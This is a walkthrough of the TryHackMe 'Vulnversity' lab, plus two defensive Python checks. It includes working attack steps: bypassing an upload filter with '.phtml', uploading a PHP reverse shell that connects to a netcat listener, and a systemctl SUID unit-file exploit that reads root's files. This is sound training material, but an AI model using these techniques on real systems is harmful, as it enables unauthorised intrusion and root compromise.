Try Hack Me — Vulnversity
Introduction
Today I will be doing a write-up for the https://tryhackme.com/ lab “Vulnversity”. You can access this lab here: https://tryhackme.com/room/vulnversity
Prerequisites
If you are unsure what BurpSuite is, or how to set it up, please complete the BurpSuite room first.
Deploy the Machine
Connect to the TryHackMe network and deploy this machine. If you are unsure how to get connected, complete the OpenVPN room first.
Reconnaissance
First we are going to gather information about this machine using a network scanning tool called nmap.
#1
Scan this box: nmap -sV <machine's ip>
The “-sV” argument will show the service version running on each open port.
#2
Scan the box, how many ports are open?
6
#3
What version of the squid proxy is running on the machine?
3.5.12
#4
How many ports will nmap scan if the flag -p-400 was used?
400
#5
Using the nmap flag -n what will it not resolve?
dns
#6
What is the most likely operating system this machine is running?
To find this we add the “-O” argument, which makes nmap attempt OS detection.
ubuntu
#7
What port is the web server running on?
3333
#8
It’s important to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (each of which can be a point of exploitation) is very important. Don’t forget that ports in a higher range might be open, so always scan ports above 1000 as well (even if you leave that scan running in the background).
Locating Directories using GoBuster
Using a fast directory discovery tool called GoBuster, you will locate a directory that you can use to upload a shell to.
#1
Let’s first start off by scanning the website to find any hidden directories. To do this, we’re going to use GoBuster.
GoBuster is a tool used to brute-force URIs (directories and files), DNS subdomains and virtual host names. For this machine, we will focus on using it to brute-force directories.
Download GoBuster here, or if you’re on Kali Linux 2020.1+ run sudo apt-get install gobuster
To get started, you will need a wordlist for GoBuster (it works through the wordlist quickly, requesting each entry to identify whether a public directory of that name exists). If you are using Kali Linux you can find many wordlists under /usr/share/wordlists.
Now let’s run GoBuster with a wordlist: gobuster dir -u http://<ip>:3333 -w <word list location>
#2
What is the directory that has an upload form page?
/internal/
Compromise the Webserver
Now that you have found a form to upload files, we can leverage it to upload and execute a payload that will lead to compromising the web server.
#1
Try uploading a few file types to the server. What common extension seems to be blocked?
.php
#2
To identify which extensions are not blocked, we’re going to fuzz the upload form.
To do this, we’re going to use BurpSuite. If you are unsure what BurpSuite is, or how to set it up, please complete the BurpSuite room first.
#3
We’re going to use Intruder (used for automating customised attacks).
To begin, make a wordlist with the following extensions in:
Now make sure BurpSuite is configured to intercept all your browser traffic. Upload a file and, once this request is captured, send it to Intruder. Click on “Payloads” and select the “Sniper” attack type.
Click the “Positions” tab now, find the filename and “Add §” around the extension. It should look like so:
Run this attack. What extension is allowed?
.phtml
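The finding above (only “.php” is rejected, so “.phtml” gets through) is a classic extension-denylist bug. The following is an added example, not code from the room, that models the weak check beside a hardened allowlist check; the sample filenames are constructed.

```python
import re
import secrets
from pathlib import PurePosixPath

# Constructed sample names (not from the room) covering what Intruder would
# submit to the upload form during fuzzing.
SAMPLE_NAMES = ["shell.php", "shell.phtml", "shell.php5", "photo.jpg",
                "PHOTO.JPG", "shell.phtml.jpg", "shell.jpg.phtml", ".htaccess"]

# Vulnerable policy, modelled on the behaviour observed in the room: only the
# literal ".php" suffix is rejected. Apache's PHP handler also serves .phtml,
# so the filter is bypassed by renaming the payload.
DENYLIST = {".php"}

def denylist_allows(filename: str) -> bool:
    return PurePosixPath(filename).suffix.lower() not in DENYLIST

# Hardened policy: a strict allowlist of the types the form actually needs,
# enforced by a whole-name regex (exactly one suffix, no dots or slashes in
# the stem), so "shell.phtml.jpg" and "shell.jpg.phtml" both fail.
ALLOWED_RE = re.compile(r"^[a-z0-9_-]{1,64}\.(jpg|jpeg|png|pdf|txt)$")

def allowlist_allows(filename: str) -> bool:
    return ALLOWED_RE.fullmatch(filename.lower()) is not None

def stored_name(filename: str) -> str:
    """Name to save the file under: a random token plus the validated
    extension, so the client never chooses the on-disk name."""
    m = ALLOWED_RE.fullmatch(filename.lower())
    if m is None:
        raise ValueError(f"rejected upload: {filename!r}")
    return f"{secrets.token_hex(8)}.{m.group(1)}"

def compare_policies(names=SAMPLE_NAMES) -> dict:
    """Map each name to (denylist verdict, allowlist verdict)."""
    return {n: (denylist_allows(n), allowlist_allows(n)) for n in names}

if __name__ == "__main__":
    for name, (weak, strong) in compare_policies().items():
        weak_s = "allow" if weak else "block"
        strong_s = "allow" if strong else "block"
        print(f"{name:18} denylist={weak_s:5} allowlist={strong_s}")
```

Storing uploads outside the web root (or with the PHP handler disabled for that directory) removes the execution path even if the name check is wrong.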
#4
Now that we know what extension we can use for our payload, we can progress.
We are going to use a PHP reverse shell as our payload. A reverse shell works by being executed on the remote host and forcing that host to make a connection back to you. So you’ll listen for incoming connections, upload and execute your shell, and it will beacon out to you so you can control the box!
Download the following reverse PHP shell here.
To gain remote access to this machine, follow the
- Edit the php-reverse-shell.php file and set the ip to your tun0 ip (you can get this by going to your access page on TryHackMe and using your internal ip).
- Rename this file to php-reverse-shell.phtml
- We’re now going to listen for incoming connections using netcat. Run the following command: nc -lvnp 1234
- Upload your shell and navigate to http://<ip>:3333/internal/uploads/php-reverse-shell.phtml; this will execute your payload.
- You should see a connection on your netcat session.
#5
What is the name of the user who manages the webserver? To find this, navigate to the home directory and check the user name:
bill
#6
What is the user flag? Change directory into bill’s home directory and pull the contents of the text file inside via the “cat” command:
cat user.txt
Privilege Escalation
Now you have compromised this machine, we are going to escalate our privileges and become the superuser (root).
#1
In Linux, SUID (set owner userId upon execution) is a special type of file permission given to a file. SUID gives temporary permissions to a user to run the program/file with the permission of the file owner (rather than the user who runs it).
For example, the binary to change your password has the SUID bit set on it (/usr/bin/passwd). This is because, to change your password, it needs to write to the shadow file, which you do not have access to but root does, so the program runs with root privileges to make the change.
On the system, search for all SUID files (to do this run the following: “find / -user root -perm -4000 -exec ls -ldb {} \;”).
What file stands out?
systemctl
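The find command above is also how a defender audits a host: any SUID-root binary that is not part of the distribution's normal set (here, systemctl) is a finding. The following is an added example, not code from the room, that parses constructed “ls -ld” output and diffs it against an assumed, abridged baseline of stock Ubuntu SUID binaries.

```python
import re

# Constructed sample of the output of
#   find / -user root -perm -4000 -exec ls -ldb {} \;
# as it might look on the room's Ubuntu box (sizes and dates are illustrative).
SAMPLE_LS = """\
-rwsr-xr-x 1 root root  40432 Jan 27  2020 /bin/su
-rwsr-xr-x 1 root root 659856 Feb 13  2019 /bin/systemctl
-rwsr-xr-x 1 root root  44664 Jan 27  2020 /usr/bin/passwd
-rwsr-xr-x 1 root root  54256 Jan 27  2020 /usr/bin/chfn
-rwsr-xr-x 1 root root 136808 Jan 31  2020 /usr/bin/sudo
-rwsr-xr-x 1 root root  10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
"""

# Assumed, abridged baseline of SUID-root binaries on a stock Ubuntu install.
# Build the real one from a clean image of the same release.
BASELINE = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/fusermount",
    "/usr/bin/passwd", "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/usr/bin/sudo", "/usr/bin/pkexec",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}

# mode, link count, owner, group, size, month, day, year-or-time, path
LS_LINE = re.compile(
    r"^(?P<mode>[-a-zA-Z]{10})[.+]?\s+\d+\s+(?P<user>\S+)\s+\S+\s+\d+"
    r"\s+\S+\s+\S+\s+\S+\s+(?P<path>/\S+)$")

def parse_ls(text):
    """Yield (path, owner, is_suid) for each `ls -ld` line; skip junk lines."""
    for line in text.splitlines():
        m = LS_LINE.match(line)
        if not m:
            continue
        mode = m.group("mode")
        is_suid = mode[3] in "sS"   # setuid shows in the owner-execute slot
        yield m.group("path"), m.group("user"), is_suid

def unexpected_suid(text, baseline=BASELINE):
    """Return SUID-root paths that are not in the baseline, sorted."""
    return sorted(p for p, owner, suid in parse_ls(text)
                  if suid and owner == "root" and p not in baseline)

if __name__ == "__main__":
    for path in unexpected_suid(SAMPLE_LS):
        print("unexpected SUID-root binary:", path)
```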
#2
It’s challenge time! We have guided you this far; are you able to exploit this system further to escalate your privileges and get the final answer?
Become root and get the last flag (/root/root.txt)
First things first: we need to get a stable shell, which we can do by entering the following:
python3 -c "import pty; pty.spawn('/bin/bash')"
Your working directory should now look something similar to:
As we know the device has “systemctl” with the SUID bit set, we can exploit that permission. SUID (Set owner User ID upon execution) is a special file permission that makes a program run with the permissions of its owner (here root) rather than those of the logged-in user who launches it.
Doing some research into systemctl privilege escalation techniques, I was pointed towards GTFOBins and attempted to run the script provided by them; unfortunately I couldn’t establish a root session, so I had to change the configuration a little to the below:
rowls=$(mktemp).service
echo '[Service]
ExecStart=/bin/bash -c "cat /root/root.txt > /home/bill/output.txt"
[Install]
WantedBy=multi-user.target' > $rowls
/bin/systemctl link $rowls
/bin/systemctl enable --now $rowls
So let’s break this down a bit for further understanding.
rowls=$(mktemp).service
This creates a new shell variable named “rowls” holding the path of a temporary file, with “.service” appended so it can be used as a system service file.
echo '[Service]
echo writes its argument out, and the opening single quote ‘ lets us enter multiple lines until the closing quote finishes our entry.
ExecStart=/bin/bash -c "cat /root/root.txt > /home/bill/output.txt"
Once the service has started, the system will copy the contents of the file “root.txt” from the root directory into a new file within “/home/bill” called “output.txt”.
[Install]
This begins the second section of our service file.
WantedBy=multi-user.target' > $rowls
Before the single quote, this tells the system to start the service once run level 3 is reached, i.e. before the system uses a GUI; this state is typically used for rack-mounted servers. The quote marks the end of our second section of input to the service file, and the whole thing is then redirected with “>” into the file whose path is held in “$rowls”.
/bin/systemctl link $rowls
This links the service file held in “$rowls” into systemd so that systemctl can manage it.
/bin/systemctl enable --now $rowls
Finally, this enables the previously created service file within “$rowls” and starts it immediately, reloading the system manager to ensure the change takes effect.
Now all we need to do is grab the flag from our newly created file:
cat /home/bill/output.txt
Conclusion
An amazing lab provided by TryHackMe, and the first I’ve attempted where you are set off to do your own research and execution for privesc. Although I hit some stumbling blocks, and even had a helping hand from Heiss at TryHackMe getting my stable shell and some slight code modification, we finally reached the end goal.
We were also introduced to GoBuster, abused upload forms to execute PHP scripts for a reverse shell, and continued with our newly found BurpSuite skills.
If you would like to try out this lab you can do so at https://tryhackme.com/